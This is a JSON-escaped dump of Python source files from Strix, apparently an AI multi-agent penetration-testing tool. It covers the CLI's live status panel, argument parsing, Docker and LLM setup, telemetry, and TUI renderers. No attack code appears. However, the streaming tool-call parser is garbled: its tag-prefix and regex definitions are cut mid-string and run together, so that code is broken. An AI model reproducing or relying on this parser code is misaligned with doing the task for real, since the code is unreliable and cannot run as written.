cleanup_runtime()\n\n def signal_handler(_signum: int, _frame: Any) -> None:\n tracer.cleanup()\n sys.exit(1)\n\n atexit.register(cleanup_on_exit)\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n if hasattr(signal, \"SIGHUP\"):\n signal.signal(signal.SIGHUP, signal_handler)\n\n set_global_tracer(tracer)\n\n def create_live_status() -> Panel:\n status_text = Text()\n status_text.append(\"Penetration test in progress\", style=\"bold #22c55e\")\n status_text.append(\"\\n\\n\")\n\n stats_text = build_live_stats_text(tracer, agent_config)\n if stats_text:\n status_text.append(stats_text)\n\n return Panel(\n status_text,\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"#22c55e\",\n padding=(1, 2),\n )\n\n try:\n console.print()\n\n with Live(\n create_live_status(), console=console, refresh_per_second=2, transient=False\n ) as live:\n stop_updates = threading.Event()\n\n def update_status() -> None:\n while not stop_updates.is_set():\n try:\n live.update(create_live_status())\n time.sleep(2)\n except Exception: # noqa: BLE001\n break\n\n update_thread = threading.Thread(target=update_status, daemon=True)\n update_thread.start()\n\n try:\n agent = StrixAgent(agent_config)\n result = await agent.execute_scan(scan_config)\n\n if isinstance(result, dict) and not result.get(\"success\", True):\n error_msg = result.get(\"error\", \"Unknown error\")\n error_details = result.get(\"details\")\n console.print()\n console.print(f\"[bold red]Penetration test failed:[/] {error_msg}\")\n if error_details:\n console.print(f\"[dim]{error_details}[/]\")\n console.print()\n sys.exit(1)\n finally:\n stop_updates.set()\n update_thread.join(timeout=1)\n\n except Exception as e:\n console.print(f\"[bold red]Error during penetration test:[/] {e}\")\n raise\n\n if tracer.final_scan_result:\n console.print()\n\n final_report_text = Text()\n final_report_text.append(\"Penetration test summary\", style=\"bold #60a5fa\")\n\n final_report_panel = Panel(\n Text.assemble(\n final_report_text,\n \"\\n\\n\",\n tracer.final_scan_result,\n ),\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"#60a5fa\",\n padding=(1, 2),\n )\n\n console.print(final_report_panel)\n console.print()\n" }, { "path": "strix/interface/main.py", "content": "#!/usr/bin/env python3\n\"\"\"\nStrix Agent Interface\n\"\"\"\n\nimport argparse\nimport asyncio\nimport logging\nimport shutil\nimport sys\nfrom pathlib import Path\nfrom typing import Any\n\nimport litellm\nfrom docker.errors import DockerException\nfrom rich.console import Console\nfrom rich.panel import Panel\nfrom rich.text import Text\n\nfrom strix.config import Config, apply_saved_config, save_current_config\nfrom strix.config.config import resolve_llm_config\nfrom strix.llm.utils import resolve_strix_model\n\n\napply_saved_config()\n\nfrom strix.interface.cli import run_cli # noqa: E402\nfrom strix.interface.tui import run_tui # noqa: E402\nfrom strix.interface.utils import ( # noqa: E402\n assign_workspace_subdirs,\n build_final_stats_text,\n check_docker_connection,\n clone_repository,\n collect_local_sources,\n generate_run_name,\n image_exists,\n infer_target_type,\n process_pull_line,\n rewrite_localhost_targets,\n validate_config_file,\n validate_llm_response,\n)\nfrom strix.runtime.docker_runtime import HOST_GATEWAY_HOSTNAME # noqa: E402\nfrom strix.telemetry import posthog # noqa: E402\nfrom strix.telemetry.tracer import get_global_tracer # noqa: E402\n\n\nlogging.getLogger().setLevel(logging.ERROR)\n\n\ndef validate_environment() -> None: # noqa: PLR0912, PLR0915\n console = Console()\n missing_required_vars = []\n missing_optional_vars = []\n\n strix_llm = Config.get(\"strix_llm\")\n uses_strix_models = strix_llm and strix_llm.startswith(\"strix/\")\n\n if not strix_llm:\n missing_required_vars.append(\"STRIX_LLM\")\n\n has_base_url = uses_strix_models or any(\n [\n Config.get(\"llm_api_base\"),\n Config.get(\"openai_api_base\"),\n Config.get(\"litellm_base_url\"),\n Config.get(\"ollama_api_base\"),\n ]\n )\n\n if not Config.get(\"llm_api_key\"):\n missing_optional_vars.append(\"LLM_API_KEY\")\n\n if not has_base_url:\n missing_optional_vars.append(\"LLM_API_BASE\")\n\n if not Config.get(\"perplexity_api_key\"):\n missing_optional_vars.append(\"PERPLEXITY_API_KEY\")\n\n if not Config.get(\"strix_reasoning_effort\"):\n missing_optional_vars.append(\"STRIX_REASONING_EFFORT\")\n\n if missing_required_vars:\n error_text = Text()\n error_text.append(\"MISSING REQUIRED ENVIRONMENT VARIABLES\", style=\"bold red\")\n error_text.append(\"\\n\\n\", style=\"white\")\n\n for var in missing_required_vars:\n error_text.append(f\"β€’ {var}\", style=\"bold yellow\")\n error_text.append(\" is not set\\n\", style=\"white\")\n\n if missing_optional_vars:\n error_text.append(\"\\nOptional environment variables:\\n\", style=\"dim white\")\n for var in missing_optional_vars:\n error_text.append(f\"β€’ {var}\", style=\"dim yellow\")\n error_text.append(\" is not set\\n\", style=\"dim white\")\n\n error_text.append(\"\\nRequired environment variables:\\n\", style=\"white\")\n for var in missing_required_vars:\n if var == \"STRIX_LLM\":\n error_text.append(\"β€’ \", style=\"white\")\n error_text.append(\"STRIX_LLM\", style=\"bold cyan\")\n error_text.append(\n \" - Model name to use with litellm (e.g., 'openai/gpt-5')\\n\",\n style=\"white\",\n )\n\n if missing_optional_vars:\n error_text.append(\"\\nOptional environment variables:\\n\", style=\"white\")\n for var in missing_optional_vars:\n if var == \"LLM_API_KEY\":\n error_text.append(\"β€’ \", style=\"white\")\n error_text.append(\"LLM_API_KEY\", style=\"bold cyan\")\n error_text.append(\n \" - API key for the LLM provider \"\n \"(not needed for local models, Vertex AI, AWS, etc.)\\n\",\n style=\"white\",\n )\n elif var == \"LLM_API_BASE\":\n error_text.append(\"β€’ \", style=\"white\")\n error_text.append(\"LLM_API_BASE\", style=\"bold cyan\")\n error_text.append(\n \" - Custom API base URL if using local models (e.g., Ollama, LMStudio)\\n\",\n style=\"white\",\n )\n elif var == \"PERPLEXITY_API_KEY\":\n error_text.append(\"β€’ \", style=\"white\")\n error_text.append(\"PERPLEXITY_API_KEY\", style=\"bold cyan\")\n error_text.append(\n \" - API key for Perplexity AI web search (enables real-time research)\\n\",\n style=\"white\",\n )\n elif var == \"STRIX_REASONING_EFFORT\":\n error_text.append(\"β€’ \", style=\"white\")\n error_text.append(\"STRIX_REASONING_EFFORT\", style=\"bold cyan\")\n error_text.append(\n \" - Reasoning effort level: none, minimal, low, medium, high, xhigh \"\n \"(default: high)\\n\",\n style=\"white\",\n )\n\n error_text.append(\"\\nExample setup:\\n\", style=\"white\")\n if uses_strix_models:\n error_text.append(\"export STRIX_LLM='strix/gpt-5'\\n\", style=\"dim white\")\n else:\n error_text.append(\"export STRIX_LLM='openai/gpt-5'\\n\", style=\"dim white\")\n\n if missing_optional_vars:\n for var in missing_optional_vars:\n if var == \"LLM_API_KEY\":\n error_text.append(\n \"export LLM_API_KEY='your-api-key-here' \"\n \"# not needed for local models, Vertex AI, AWS, etc.\\n\",\n style=\"dim white\",\n )\n elif var == \"LLM_API_BASE\":\n error_text.append(\n \"export LLM_API_BASE='http://localhost:11434' \"\n \"# needed for local models only\\n\",\n style=\"dim white\",\n )\n elif var == \"PERPLEXITY_API_KEY\":\n error_text.append(\n \"export PERPLEXITY_API_KEY='your-perplexity-key-here'\\n\", style=\"dim white\"\n )\n elif var == \"STRIX_REASONING_EFFORT\":\n error_text.append(\n \"export STRIX_REASONING_EFFORT='high'\\n\",\n style=\"dim white\",\n )\n\n panel = Panel(\n error_text,\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"red\",\n padding=(1, 2),\n )\n\n console.print(\"\\n\")\n console.print(panel)\n console.print()\n sys.exit(1)\n\n\ndef check_docker_installed() -> None:\n if shutil.which(\"docker\") is None:\n console = Console()\n error_text = Text()\n error_text.append(\"DOCKER NOT INSTALLED\", style=\"bold red\")\n error_text.append(\"\\n\\n\", style=\"white\")\n error_text.append(\"The 'docker' CLI was not found in your PATH.\\n\", style=\"white\")\n error_text.append(\n \"Please install Docker and ensure the 'docker' command is available.\\n\\n\", style=\"white\"\n )\n\n panel = Panel(\n error_text,\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"red\",\n padding=(1, 2),\n )\n console.print(\"\\n\", panel, \"\\n\")\n sys.exit(1)\n\n\nasync def warm_up_llm() -> None:\n console = Console()\n\n try:\n model_name, api_key, api_base = resolve_llm_config()\n litellm_model, _ = resolve_strix_model(model_name)\n litellm_model = litellm_model or model_name\n\n test_messages = [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\n {\"role\": \"user\", \"content\": \"Reply with just 'OK'.\"},\n ]\n\n llm_timeout = int(Config.get(\"llm_timeout\") or \"300\")\n\n completion_kwargs: dict[str, Any] = {\n \"model\": litellm_model,\n \"messages\": test_messages,\n \"timeout\": llm_timeout,\n }\n if api_key:\n completion_kwargs[\"api_key\"] = api_key\n if api_base:\n completion_kwargs[\"api_base\"] = api_base\n\n response = litellm.completion(**completion_kwargs)\n\n validate_llm_response(response)\n\n except Exception as e: # noqa: BLE001\n error_text = Text()\n error_text.append(\"LLM CONNECTION FAILED\", style=\"bold red\")\n error_text.append(\"\\n\\n\", style=\"white\")\n error_text.append(\"Could not establish connection to the language model.\\n\", style=\"white\")\n error_text.append(\"Please check your configuration and try again.\\n\", style=\"white\")\n error_text.append(f\"\\nError: {e}\", style=\"dim white\")\n\n panel = Panel(\n error_text,\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"red\",\n padding=(1, 2),\n )\n\n console.print(\"\\n\")\n console.print(panel)\n console.print()\n sys.exit(1)\n\n\ndef get_version() -> str:\n try:\n from importlib.metadata import version\n\n return version(\"strix-agent\")\n except Exception: # noqa: BLE001\n return \"unknown\"\n\n\ndef parse_arguments() -> argparse.Namespace:\n parser = argparse.ArgumentParser(\n description=\"Strix Multi-Agent Cybersecurity Penetration Testing Tool\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nExamples:\n # Web application penetration test\n strix --target https://example.com\n\n # GitHub repository analysis\n strix --target https://github.com/user/repo\n strix --target git@github.com:user/repo.git\n\n # Local code analysis\n strix --target ./my-project\n\n # Domain penetration test\n strix --target example.com\n\n # IP address penetration test\n strix --target 192.168.1.42\n\n # Multiple targets (e.g., white-box testing with source and deployed app)\n strix --target https://github.com/user/repo --target https://example.com\n strix --target ./my-project --target https://staging.example.com --target https://prod.example.com\n\n # Custom instructions (inline)\n strix --target example.com --instruction \"Focus on authentication vulnerabilities\"\n\n # Custom instructions (from file)\n strix --target example.com --instruction-file ./instructions.txt\n strix --target https://app.com --instruction-file /path/to/detailed_instructions.md\n \"\"\",\n )\n\n parser.add_argument(\n \"-v\",\n \"--version\",\n action=\"version\",\n version=f\"strix {get_version()}\",\n )\n\n parser.add_argument(\n \"-t\",\n \"--target\",\n type=str,\n required=True,\n action=\"append\",\n help=\"Target to test (URL, repository, local directory path, domain name, or IP address). \"\n \"Can be specified multiple times for multi-target scans.\",\n )\n parser.add_argument(\n \"--instruction\",\n type=str,\n help=\"Custom instructions for the penetration test. This can be \"\n \"specific vulnerability types to focus on (e.g., 'Focus on IDOR and XSS'), \"\n \"testing approaches (e.g., 'Perform thorough authentication testing'), \"\n \"test credentials (e.g., 'Use the following credentials to access the app: \"\n \"admin:password123'), \"\n \"or areas of interest (e.g., 'Check login API endpoint for security issues').\",\n )\n\n parser.add_argument(\n \"--instruction-file\",\n type=str,\n help=\"Path to a file containing detailed custom instructions for the penetration test. \"\n \"Use this option when you have lengthy or complex instructions saved in a file \"\n \"(e.g., '--instruction-file ./detailed_instructions.txt').\",\n )\n\n parser.add_argument(\n \"-n\",\n \"--non-interactive\",\n action=\"store_true\",\n help=(\n \"Run in non-interactive mode (no TUI, exits on completion). \"\n \"Default is interactive mode with TUI.\"\n ),\n )\n\n parser.add_argument(\n \"-m\",\n \"--scan-mode\",\n type=str,\n choices=[\"quick\", \"standard\", \"deep\"],\n default=\"deep\",\n help=(\n \"Scan mode: \"\n \"'quick' for fast CI/CD checks, \"\n \"'standard' for routine testing, \"\n \"'deep' for thorough security reviews (default). \"\n \"Default: deep.\"\n ),\n )\n\n parser.add_argument(\n \"--config\",\n type=str,\n help=\"Path to a custom config file (JSON) to use instead of ~/.strix/cli-config.json\",\n )\n\n args = parser.parse_args()\n\n if args.instruction and args.instruction_file:\n parser.error(\n \"Cannot specify both --instruction and --instruction-file. Use one or the other.\"\n )\n\n if args.instruction_file:\n instruction_path = Path(args.instruction_file)\n try:\n with instruction_path.open(encoding=\"utf-8\") as f:\n args.instruction = f.read().strip()\n if not args.instruction:\n parser.error(f\"Instruction file '{instruction_path}' is empty\")\n except Exception as e: # noqa: BLE001\n parser.error(f\"Failed to read instruction file '{instruction_path}': {e}\")\n\n args.targets_info = []\n for target in args.target:\n try:\n target_type, target_dict = infer_target_type(target)\n\n if target_type == \"local_code\":\n display_target = target_dict.get(\"target_path\", target)\n else:\n display_target = target\n\n args.targets_info.append(\n {\"type\": target_type, \"details\": target_dict, \"original\": display_target}\n )\n except ValueError:\n parser.error(f\"Invalid target '{target}'\")\n\n assign_workspace_subdirs(args.targets_info)\n rewrite_localhost_targets(args.targets_info, HOST_GATEWAY_HOSTNAME)\n\n return args\n\n\ndef display_completion_message(args: argparse.Namespace, results_path: Path) -> None:\n console = Console()\n tracer = get_global_tracer()\n\n scan_completed = False\n if tracer and tracer.scan_results:\n scan_completed = tracer.scan_results.get(\"scan_completed\", False)\n\n completion_text = Text()\n if scan_completed:\n completion_text.append(\"Penetration test completed\", style=\"bold #22c55e\")\n else:\n completion_text.append(\"SESSION ENDED\", style=\"bold #eab308\")\n\n target_text = Text()\n target_text.append(\"Target\", style=\"dim\")\n target_text.append(\" \")\n if len(args.targets_info) == 1:\n target_text.append(args.targets_info[0][\"original\"], style=\"bold white\")\n else:\n target_text.append(f\"{len(args.targets_info)} targets\", style=\"bold white\")\n for target_info in args.targets_info:\n target_text.append(\"\\n \")\n target_text.append(target_info[\"original\"], style=\"white\")\n\n stats_text = build_final_stats_text(tracer)\n\n panel_parts = [completion_text, \"\\n\\n\", target_text]\n\n if stats_text.plain:\n panel_parts.extend([\"\\n\", stats_text])\n\n results_text = Text()\n results_text.append(\"\\n\")\n results_text.append(\"Output\", style=\"dim\")\n results_text.append(\" \")\n results_text.append(str(results_path), style=\"#60a5fa\")\n panel_parts.extend([\"\\n\", results_text])\n\n panel_content = Text.assemble(*panel_parts)\n\n border_style = \"#22c55e\" if scan_completed else \"#eab308\"\n\n panel = Panel(\n panel_content,\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=border_style,\n padding=(1, 2),\n )\n\n console.print(\"\\n\")\n console.print(panel)\n console.print()\n console.print(\"[#60a5fa]models.strix.ai[/] [dim]Β·[/] [#60a5fa]discord.gg/strix-ai[/]\")\n console.print()\n\n\ndef pull_docker_image() -> None:\n console = Console()\n client = check_docker_connection()\n\n if image_exists(client, Config.get(\"strix_image\")): # type: ignore[arg-type]\n return\n\n console.print()\n console.print(f\"[dim]Pulling image[/] {Config.get('strix_image')}\")\n console.print(\"[dim yellow]This only happens on first run and may take a few minutes...[/]\")\n console.print()\n\n with console.status(\"[bold cyan]Downloading image layers...\", spinner=\"dots\") as status:\n try:\n layers_info: dict[str, str] = {}\n last_update = \"\"\n\n for line in client.api.pull(Config.get(\"strix_image\"), stream=True, decode=True):\n last_update = process_pull_line(line, layers_info, status, last_update)\n\n except DockerException as e:\n console.print()\n error_text = Text()\n error_text.append(\"FAILED TO PULL IMAGE\", style=\"bold red\")\n error_text.append(\"\\n\\n\", style=\"white\")\n error_text.append(f\"Could not download: {Config.get('strix_image')}\\n\", style=\"white\")\n error_text.append(str(e), style=\"dim red\")\n\n panel = Panel(\n error_text,\n title=\"[bold white]STRIX\",\n title_align=\"left\",\n border_style=\"red\",\n padding=(1, 2),\n )\n console.print(panel, \"\\n\")\n sys.exit(1)\n\n success_text = Text()\n success_text.append(\"Docker image ready\", style=\"#22c55e\")\n console.print(success_text)\n console.print()\n\n\ndef apply_config_override(config_path: str) -> None:\n Config._config_file_override = validate_config_file(config_path)\n apply_saved_config(force=True)\n\n\ndef persist_config() -> None:\n if Config._config_file_override is None:\n save_current_config()\n\n\ndef main() -> None:\n if sys.platform == \"win32\":\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n\n args = parse_arguments()\n\n if args.config:\n apply_config_override(args.config)\n\n check_docker_installed()\n pull_docker_image()\n\n validate_environment()\n asyncio.run(warm_up_llm())\n\n persist_config()\n\n args.run_name = generate_run_name(args.targets_info)\n\n for target_info in args.targets_info:\n if target_info[\"type\"] == \"repository\":\n repo_url = target_info[\"details\"][\"target_repo\"]\n dest_name = target_info[\"details\"].get(\"workspace_subdir\")\n cloned_path = clone_repository(repo_url, args.run_name, dest_name)\n target_info[\"details\"][\"cloned_repo_path\"] = cloned_path\n\n args.local_sources = collect_local_sources(args.targets_info)\n\n is_whitebox = bool(args.local_sources)\n\n posthog.start(\n model=Config.get(\"strix_llm\"),\n scan_mode=args.scan_mode,\n is_whitebox=is_whitebox,\n interactive=not args.non_interactive,\n has_instructions=bool(args.instruction),\n )\n\n exit_reason = \"user_exit\"\n try:\n if args.non_interactive:\n asyncio.run(run_cli(args))\n else:\n asyncio.run(run_tui(args))\n except KeyboardInterrupt:\n exit_reason = \"interrupted\"\n except Exception as e:\n exit_reason = \"error\"\n posthog.error(\"unhandled_exception\", str(e))\n raise\n finally:\n tracer = get_global_tracer()\n if tracer:\n posthog.end(tracer, exit_reason=exit_reason)\n\n results_path = Path(\"strix_runs\") / args.run_name\n display_completion_message(args, results_path)\n\n if args.non_interactive:\n tracer = get_global_tracer()\n if tracer and tracer.vulnerability_reports:\n sys.exit(2)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": "strix/interface/streaming_parser.py", "content": "import html\nimport re\nfrom dataclasses import dataclass\nfrom typing import Literal\n\nfrom strix.llm.utils import normalize_tool_format\n\n\n_FUNCTION_TAG_PREFIX = \"]+)>\")\n_FUNC_END_PATTERN = re.compile(r\"\")\n_COMPLETE_PARAM_PATTERN = re.compile(r\"]+)>(.*?)\", re.DOTALL)\n_INCOMPLETE_PARAM_PATTERN = re.compile(r\"]+)>(.*)$\", re.DOTALL)\n\n\ndef _get_safe_content(content: str) -> tuple[str, str]:\n if not content:\n return \"\", \"\"\n\n last_lt = content.rfind(\"<\")\n if last_lt == -1:\n return content, \"\"\n\n suffix = content[last_lt:]\n\n if _FUNCTION_TAG_PREFIX.startswith(suffix) or _INVOKE_TAG_PREFIX.startswith(suffix):\n return content[:last_lt], suffix\n\n return content, \"\"\n\n\n@dataclass\nclass StreamSegment:\n type: Literal[\"text\", \"tool\"]\n content: str\n tool_name: str | None = None\n args: dict[str, str] | None = None\n is_complete: bool = False\n\n\ndef parse_streaming_content(content: str) -> list[StreamSegment]:\n if not content:\n return []\n\n content = normalize_tool_format(content)\n\n segments: list[StreamSegment] = []\n\n func_matches = list(_FUNC_PATTERN.finditer(content))\n\n if not func_matches:\n safe_content, _ = _get_safe_content(content)\n text = safe_content.strip()\n if text:\n segments.append(StreamSegment(type=\"text\", content=text))\n return segments\n\n first_func_start = func_matches[0].start()\n if first_func_start > 0:\n text_before = content[:first_func_start].strip()\n if text_before:\n segments.append(StreamSegment(type=\"text\", content=text_before))\n\n for i, match in enumerate(func_matches):\n tool_name = match.group(1)\n func_start = match.end()\n\n func_end_match = _FUNC_END_PATTERN.search(content, func_start)\n\n if func_end_match:\n func_body = content[func_start : func_end_match.start()]\n is_complete = True\n end_pos = func_end_match.end()\n else:\n if i + 1 < len(func_matches):\n next_func_start = func_matches[i + 1].start()\n func_body = content[func_start:next_func_start]\n else:\n func_body = content[func_start:]\n is_complete = False\n end_pos = len(content)\n\n args = _parse_streaming_params(func_body)\n\n segments.append(\n StreamSegment(\n type=\"tool\",\n content=func_body,\n tool_name=tool_name,\n args=args,\n is_complete=is_complete,\n )\n )\n\n if is_complete and i + 1 < len(func_matches):\n next_start = func_matches[i + 1].start()\n text_between = content[end_pos:next_start].strip()\n if text_between:\n segments.append(StreamSegment(type=\"text\", content=text_between))\n\n return segments\n\n\ndef _parse_streaming_params(func_body: str) -> dict[str, str]:\n args: dict[str, str] = {}\n\n complete_matches = list(_COMPLETE_PARAM_PATTERN.finditer(func_body))\n complete_end_pos = 0\n\n for match in complete_matches:\n param_name = match.group(1)\n param_value = html.unescape(match.group(2).strip())\n args[param_name] = param_value\n complete_end_pos = max(complete_end_pos, match.end())\n\n remaining = func_body[complete_end_pos:]\n incomplete_match = _INCOMPLETE_PARAM_PATTERN.search(remaining)\n if incomplete_match:\n param_name = incomplete_match.group(1)\n param_value = html.unescape(incomplete_match.group(2).strip())\n args[param_name] = param_value\n\n return args\n" }, { "path": "strix/interface/tool_components/__init__.py", "content": "from . import (\n agent_message_renderer,\n agents_graph_renderer,\n browser_renderer,\n file_edit_renderer,\n finish_renderer,\n load_skill_renderer,\n notes_renderer,\n proxy_renderer,\n python_renderer,\n reporting_renderer,\n scan_info_renderer,\n terminal_renderer,\n thinking_renderer,\n todo_renderer,\n user_message_renderer,\n web_search_renderer,\n)\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import ToolTUIRegistry, get_tool_renderer, register_tool_renderer, render_tool_widget\n\n\n__all__ = [\n \"BaseToolRenderer\",\n \"ToolTUIRegistry\",\n \"agent_message_renderer\",\n \"agents_graph_renderer\",\n \"browser_renderer\",\n \"file_edit_renderer\",\n \"finish_renderer\",\n \"get_tool_renderer\",\n \"load_skill_renderer\",\n \"notes_renderer\",\n \"proxy_renderer\",\n \"python_renderer\",\n \"register_tool_renderer\",\n \"render_tool_widget\",\n \"reporting_renderer\",\n \"scan_info_renderer\",\n \"terminal_renderer\",\n \"thinking_renderer\",\n \"todo_renderer\",\n \"user_message_renderer\",\n \"web_search_renderer\",\n]\n" }, { "path": "strix/interface/tool_components/agent_message_renderer.py", "content": "from functools import cache\nfrom typing import Any, ClassVar\n\nfrom pygments.lexers import get_lexer_by_name, guess_lexer\nfrom pygments.styles import get_style_by_name\nfrom pygments.util import ClassNotFound\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n_HEADER_STYLES = [\n (\"###### \", 7, \"bold #4ade80\"),\n (\"##### \", 6, \"bold #22c55e\"),\n (\"#### \", 5, \"bold #16a34a\"),\n (\"### \", 4, \"bold #15803d\"),\n (\"## \", 3, \"bold #22c55e\"),\n (\"# \", 2, \"bold #4ade80\"),\n]\n\n\n@cache\ndef _get_style_colors() -> dict[Any, str]:\n style = get_style_by_name(\"native\")\n return {token: f\"#{style_def['color']}\" for token, style_def in style if style_def[\"color\"]}\n\n\ndef _get_token_color(token_type: Any) -> str | None:\n colors = _get_style_colors()\n while token_type:\n if token_type in colors:\n return colors[token_type]\n token_type = token_type.parent\n return None\n\n\ndef _highlight_code(code: str, language: str | None = None) -> Text:\n text = Text()\n\n try:\n lexer = get_lexer_by_name(language) if language else guess_lexer(code)\n except ClassNotFound:\n text.append(code, style=\"#d4d4d4\")\n return text\n\n for token_type, token_value in lexer.get_tokens(code):\n if not token_value:\n continue\n color = _get_token_color(token_type)\n text.append(token_value, style=color)\n\n return text\n\n\ndef _try_parse_header(line: str) -> tuple[str, str] | None:\n for prefix, strip_len, style in _HEADER_STYLES:\n if line.startswith(prefix):\n return (line[strip_len:], style)\n return None\n\n\ndef _apply_markdown_styles(text: str) -> Text: # noqa: PLR0912\n result = Text()\n lines = text.split(\"\\n\")\n\n in_code_block = False\n code_block_lang: str | None = None\n code_block_lines: list[str] = []\n\n for i, line in enumerate(lines):\n if i > 0 and not in_code_block:\n result.append(\"\\n\")\n\n if line.startswith(\"```\"):\n if not in_code_block:\n in_code_block = True\n code_block_lang = line[3:].strip() or None\n code_block_lines = []\n if i > 0:\n result.append(\"\\n\")\n else:\n in_code_block = False\n code_content = \"\\n\".join(code_block_lines)\n if code_content:\n result.append_text(_highlight_code(code_content, code_block_lang))\n code_block_lines = []\n code_block_lang = None\n continue\n\n if in_code_block:\n code_block_lines.append(line)\n continue\n\n header = _try_parse_header(line)\n if header:\n result.append(header[0], style=header[1])\n elif line.startswith(\"> \"):\n result.append(\"┃ \", style=\"#22c55e\")\n result.append_text(_process_inline_formatting(line[2:]))\n elif line.startswith((\"- \", \"* \")):\n result.append(\"β€’ \", style=\"#22c55e\")\n result.append_text(_process_inline_formatting(line[2:]))\n elif len(line) > 2 and line[0].isdigit() and line[1:3] in (\". \", \") \"):\n result.append(line[0] + \". \", style=\"#22c55e\")\n result.append_text(_process_inline_formatting(line[2:]))\n elif line.strip() in (\"---\", \"***\", \"___\"):\n result.append(\"─\" * 40, style=\"#22c55e\")\n else:\n result.append_text(_process_inline_formatting(line))\n\n if in_code_block and code_block_lines:\n code_content = \"\\n\".join(code_block_lines)\n result.append_text(_highlight_code(code_content, code_block_lang))\n\n return result\n\n\ndef _process_inline_formatting(line: str) -> Text:\n result = Text()\n i = 0\n n = len(line)\n\n while i < n:\n if i + 1 < n and line[i : i + 2] in (\"**\", \"__\"):\n marker = line[i : i + 2]\n end = line.find(marker, i + 2)\n if end != -1:\n result.append(line[i + 2 : end], style=\"bold #4ade80\")\n i = end + 2\n continue\n\n if i + 1 < n and line[i : i + 2] == \"~~\":\n end = line.find(\"~~\", i + 2)\n if end != -1:\n result.append(line[i + 2 : end], style=\"strike #525252\")\n i = end + 2\n continue\n\n if line[i] == \"`\":\n end = line.find(\"`\", i + 1)\n if end != -1:\n result.append(line[i + 1 : end], style=\"bold #22c55e on #0a0a0a\")\n i = end + 1\n continue\n\n if line[i] in (\"*\", \"_\"):\n marker = line[i]\n if i + 1 < n and line[i + 1] != marker:\n end = line.find(marker, i + 1)\n if end != -1 and (end + 1 >= n or line[end + 1] != marker):\n result.append(line[i + 1 : end], style=\"italic #86efac\")\n i = end + 1\n continue\n\n result.append(line[i])\n i += 1\n\n return result\n\n\n@register_tool_renderer\nclass AgentMessageRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"agent_message\"\n css_classes: ClassVar[list[str]] = [\"chat-message\", \"agent-message\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n content = tool_data.get(\"content\", \"\")\n\n if not content:\n return Static(Text(), classes=\" \".join(cls.css_classes))\n\n styled_text = _apply_markdown_styles(content)\n\n return Static(styled_text, classes=\" \".join(cls.css_classes))\n\n @classmethod\n def render_simple(cls, content: str) -> Text:\n if not content:\n return Text()\n\n from strix.llm.utils import clean_content\n\n cleaned = clean_content(content)\n if not cleaned:\n return Text()\n\n return _apply_markdown_styles(cleaned)\n" }, { "path": "strix/interface/tool_components/agents_graph_renderer.py", "content": "from typing import Any, ClassVar\n\nfrom rich.text import Text\nfrom textual.widgets import Static\n\nfrom .base_renderer import BaseToolRenderer\nfrom .registry import register_tool_renderer\n\n\n@register_tool_renderer\nclass ViewAgentGraphRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"view_agent_graph\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"agents-graph-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n status = tool_data.get(\"status\", \"unknown\")\n\n text = Text()\n text.append(\"β—‡ \", style=\"#a78bfa\")\n text.append(\"viewing agents graph\", style=\"dim\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass CreateAgentRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"create_agent\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"agents-graph-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n\n task = args.get(\"task\", \"\")\n name = args.get(\"name\", \"Agent\")\n\n text = Text()\n text.append(\"β—ˆ \", style=\"#a78bfa\")\n text.append(\"spawning \", style=\"dim\")\n text.append(name, style=\"bold #a78bfa\")\n\n if task:\n text.append(\"\\n \")\n text.append(task, style=\"dim\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass SendMessageToAgentRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"send_message_to_agent\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"agents-graph-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n status = tool_data.get(\"status\", \"unknown\")\n\n message = args.get(\"message\", \"\")\n agent_id = args.get(\"agent_id\", \"\")\n\n text = Text()\n text.append(\"β†’ \", style=\"#60a5fa\")\n if agent_id:\n text.append(f\"to {agent_id}\", style=\"dim\")\n else:\n text.append(\"sending message\", style=\"dim\")\n\n if message:\n text.append(\"\\n \")\n text.append(message, style=\"dim\")\n\n css_classes = cls.get_css_classes(status)\n return Static(text, classes=css_classes)\n\n\n@register_tool_renderer\nclass AgentFinishRenderer(BaseToolRenderer):\n tool_name: ClassVar[str] = \"agent_finish\"\n css_classes: ClassVar[list[str]] = [\"tool-call\", \"agents-graph-tool\"]\n\n @classmethod\n def render(cls, tool_data: dict[str, Any]) -> Static:\n args = tool_data.get(\"args\", {})\n\n result_summary = args.get(\"result_summary\", \"\")\n findings = args.get(\"findings\", [])\n success = args.get(\"success\", True)\n\n text = Text()\n\n if success:\n text.append(\"β—† \", style=\"#22c55e\")\n text.append(\"Agent completed\", style=\"bold #22c55e\")\n else:\n text.append(\"β—† \", style=\"#ef4444\")\n text.append(\"Agent failed\", style=\"bold #ef4444\")\n\n if result_summary:\n text.append(\"\\n \")\n text.append(result_summary, style=\"bold\")\n\n if findings and isinstance(findings, list):\n for finding in findings:\n text.append(\"\\n β€’ \")\n 